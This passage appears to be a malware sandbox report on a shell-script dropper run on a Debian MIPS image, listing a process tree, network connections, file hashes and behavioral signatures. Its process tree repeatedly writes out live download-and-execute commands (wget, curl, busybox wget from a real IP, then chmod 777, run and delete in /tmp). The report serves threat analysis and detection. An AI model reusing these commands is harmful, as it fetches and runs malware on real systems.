[./I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]

/bin/rm

[rm I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]

/usr/bin/wget

[wget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]

/bin/chmod

[chmod 777 zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]

/tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq

[./zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]

/bin/rm

[rm zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]

/usr/bin/wget

[wget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]

/bin/chmod

[chmod 777 h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]

/tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N

[./h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]

/bin/rm

[rm h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]

/usr/bin/wget

[wget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]

/bin/chmod

[chmod 777 tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]

/tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj

[./tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]

/bin/rm

[rm tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]

/usr/bin/wget

[wget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]

/bin/chmod

[chmod 777 nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]

/tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp

[./nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]

/bin/rm

[rm nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]

/usr/bin/wget

[wget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]

/bin/chmod

[chmod 777 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]

/tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67

[./271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]

/bin/rm

[rm 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]

/usr/bin/wget

[wget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]

/bin/chmod

[chmod 777 xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]

/tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT

[./xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]

/bin/rm

[rm xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]

/usr/bin/wget

[wget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]

/bin/chmod

[chmod 777 pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]

/tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly

[./pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]

/bin/rm

[rm pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]

/usr/bin/wget

[wget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]

/bin/chmod

[chmod 777 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]

/tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m

[./2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]

/bin/rm

[rm 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]

/usr/bin/wget

[wget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]

/bin/chmod

[chmod 777 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]

/tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67

[./271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]

/bin/rm

[rm 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]

/usr/bin/wget

[wget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]

/bin/chmod

[chmod 777 xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]

/tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT

[./xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]

/bin/rm

[rm xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]

/usr/bin/wget

[wget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]

/bin/chmod

[chmod 777 Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]

/tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp

[./Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]

/bin/rm

[rm Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]

/usr/bin/wget

[wget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]

/bin/chmod

[chmod 777 I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]

/tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ

[./I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]

/bin/rm

[rm I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]

/usr/bin/wget

[wget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]

/bin/chmod

[chmod 777 zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]

/tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq

[./zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]

/bin/rm

[rm zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]

/usr/bin/wget

[wget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]

/bin/chmod

[chmod 777 h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]

/tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N

[./h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]

/bin/rm

[rm h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]

/usr/bin/wget

[wget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]

/bin/chmod

[chmod 777 tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]

/tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj

[./tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]

/bin/rm

[rm tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]

/usr/bin/wget

[wget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]

/bin/chmod

[chmod 777 nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]

/tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp

[./nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]

/bin/rm

[rm nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]

/usr/bin/wget

[wget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]

/bin/chmod

[chmod 777 Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]

/tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S

[./Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]

/bin/rm

[rm Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]

/usr/bin/wget

[wget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]

/bin/chmod

[chmod 777 RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]

/tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA

[./RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]

/bin/rm

[rm RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]

/usr/bin/wget

[wget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]

/bin/chmod

[chmod 777 zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]

/tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz

[./zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]

/bin/rm

[rm zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]

/usr/bin/wget

[wget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]

/bin/chmod

[chmod 777 OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]

/tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb

[./OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]

/bin/rm

[rm OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]

Network

Country Destination Domain Proto
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp

Files

/tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-21 01:30

Reported

2024-10-21 01:33

Platform

debian9-mipsel-20240729-en

Max time kernel

72s

Max time network

74s

Command Line

[/tmp/9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA N/A
N/A /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz N/A
N/A /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb N/A
N/A /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S N/A
N/A /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly N/A
N/A /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m N/A
N/A /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp N/A
N/A /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ N/A
N/A /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq N/A
N/A /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N N/A
N/A /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj N/A
N/A /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp N/A
N/A /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 N/A
N/A /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT N/A
N/A /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly N/A
N/A /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m N/A
N/A /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 N/A
N/A /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT N/A
N/A /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp N/A
N/A /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ N/A
N/A /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq N/A
N/A /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N N/A
N/A /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj N/A
N/A /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp N/A
N/A /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S N/A
N/A /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA N/A
N/A /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz N/A
N/A /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/rm N/A
N/A N/A /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ /usr/bin/curl N/A
File opened for modification /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT /usr/bin/curl N/A
File opened for modification /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ /usr/bin/curl N/A
File opened for modification /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA /usr/bin/curl N/A
File opened for modification /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz /usr/bin/curl N/A
File opened for modification /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N /usr/bin/curl N/A
File opened for modification /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq /usr/bin/curl N/A
File opened for modification /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp /usr/bin/curl N/A
File opened for modification /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb /usr/bin/curl N/A
File opened for modification /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S /usr/bin/curl N/A
File opened for modification /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly /usr/bin/curl N/A
File opened for modification /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 /usr/bin/curl N/A
File opened for modification /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly /usr/bin/curl N/A
File opened for modification /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq /usr/bin/curl N/A
File opened for modification /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N /usr/bin/curl N/A
File opened for modification /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp /usr/bin/curl N/A
File opened for modification /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT /usr/bin/curl N/A
File opened for modification /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S /usr/bin/curl N/A
File opened for modification /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb /usr/bin/curl N/A
File opened for modification /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m /usr/bin/curl N/A
File opened for modification /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp /usr/bin/curl N/A
